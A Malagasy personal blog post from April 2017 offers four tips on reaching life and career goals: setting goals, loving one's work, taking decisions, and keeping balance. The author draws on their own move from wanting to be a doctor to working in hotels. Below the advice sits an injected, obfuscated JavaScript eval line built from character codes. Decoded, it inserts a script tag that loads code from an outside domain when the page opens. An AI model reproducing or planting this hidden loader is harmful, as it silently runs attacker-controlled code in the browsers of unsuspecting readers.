Blaogin’ny Namana Serasera weblog

Archive for Aprily, 2017

Sao mahasoa

Inona ny tokony hatao raha te hanana na te hanatratra tanjona ianao:

 

Isika rehatra izao dia mikatsaka ny hahazo tombontsoa eo @ fiainana avokoa, ary vao teraka isika dia misy ilay fomba fitenintsika hoe “samy nosoran-dreniny menaka” daholo. Midika izany fa ny Menaka na solika dia natao hampiodina ny fiainana, natao indrindra koa hampisosa ny fiainana mba tsy hisy rahoraho eo aminy fa hihodina soa ny milina rehetra tsy hisy ny sakana.

Rehefa vita ny fianarana fa tsy ny fanabeazana satria ny fotoana fanabeazana dia tsy mba mety tapitra, fa ny fianarana any an-dakilasy kosa ilay fanovozana na fandratoana fianarana dia mety hisy fetrany ihany, nefa moa raha tiana ny hanohy izany dia mety tsy hisy fetrany ihany koa io, ka hoy aho hoe, rehefa tonga eo @ ilay fotoana hijabahana @ asa fameloman-tena aza ianao dia indreto misy toro-hevitra vitsivitsy mety hahasoa anao.

  1. Voalohany aloha dia ezaho ny hanana tanjona eo @ fiainana. Izany hoe isika rehetra ireto dia tsy miaina fahatany fotsiny ety an-tany, fa samy manana ny diantsika avy nefa dia samy manana lalana ahatongavana @ izay tanjona izay isika, fa ny tena zava-dehibe dia ilaina abaribary izy io aao anaatinao ao hoe ity ny ahy ny tanjoko, ohatra tiako ny hanana zanaka hendry, na koa hanana trano be sy vady tsara, ary asa……(ambition)
  2. Faha roa indray dia tiavo ary aza atao ambanin-javatra ny fitiavana io asanao io fa io no fidiram-bolanao, izany hoe mila ovanao ho fitaovana mihintsy io fitiavanao ny asa fivelomanao io mba tsy ho monamonaina ianao ary tsy halaina rehefa handeha hamonjy azy, ohatran’ny mpifamofo handeha hifamontoana, mangitakitaka ery ary maika ery ny hihaona, ary tokony ho tahaka izay ianao rehefa hiomana ka handeha hamonjy ny asanao. Raha tsy ao am-ponao mantsy ilay fitiavanao ny asanao dia ho diso tetika ianao satria dia ho fati-antoka be ho anao izany, diso planina ianao tsy misy fitiavana tsy misy fankasitrahana io asa io. Omeko ohatra kely ianao, izaho dia fony mbola kilasy faha 5 T5 raha tany Madagasikara  tao @ La Providence Amparibe dia efa fantatro fa hanao dokotera aho, nandeha ny fotoana dia teo à kilasse faha 8 na 4ème dia natahotra aho fa nahita olona nianjera ary tapaka ary hita tety ivelany ny taolany torak’ovitra aho ary teo dia nisinda ny nofinofiko sy ny tanjoko ho dokotera ary vetivety monja dia nahita tanjona ho tratrarina vaovao indray aho dia ny hoe hiasa amina hotely aho tsy mbola fantako na hoe ho mpahandro aho na ho mpandray olona t@ izany fa hoe hanana izay fanomezam-pahasoavana izay aho…. tojo ny tanjoko aho ankehitriny, tratrako izay, mila manatratra tanjona vaovao hafa indray aho izany fa tsy mbola lazaiko anareo aloha…..Ka izay no ataoko hoe io tanjona io dia mety tsy volena fa mety efa ao anatinao ao, ary raha efa ao anatinao ao izy io dia ho mora foana aminao ny hanatateraka izay. (Passion du métier–> bon plan de carrière –>bonheur –> réussite)
  3. Faha telo indray dia ny finiavana ary fahasahiana mandray fanapahan-kevitra henitra eo @ fiainana na aka’asa izany na eo @ fiainana manokana, Tsy mora ny mandray izay andraaikitra izay eo à fiainana nefa raha tianao ny handroso dia tsy misy afatsy ny tenanao ihany no afaka hanampy anao, tsy afaka ny hihaino ny hevitry ny hafa ianao satria tsy ireo no hiaina ny misy anao fa ianao ihany, azonao atao ny mangataka hevitraa fa anjaranao kosa ny mandanjalanja hoe aiza ny lalana mora sy ara-dalàna ahatratrarako ny tanjona tiako ho tratra.(prise de risque)
  4. Ny faha efatra farany dia ny fahaizana mandanjalanja ny toerana misy anao, sy ny ametrahanao anao sy ny manodidina anao, rehefa miasa mantsy isika dia tsy hoe ny asa ihany sisa no misy fa mba jerena ihany koa ny manodidina sao dia lasa andevozin’io asa io indray avy eo ka tsy hahay intsony hametraka ny tena sy ny manodidina @ toerana misy azy avy. Mahaiza misaotra ilay Mpahary fa izy no nanome anao, ny fianakavianao satria izy ireo no miahy anao, ary koa aza atao an-tsirambina ny vatanao fa io no tempolinao, omeo sakafo araa-pahasalamana izy ary taizao @ fanatanjahan-tena araka ny fahafahanao @ fandaharam-potoananao.(l’équilibre)

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


32 comments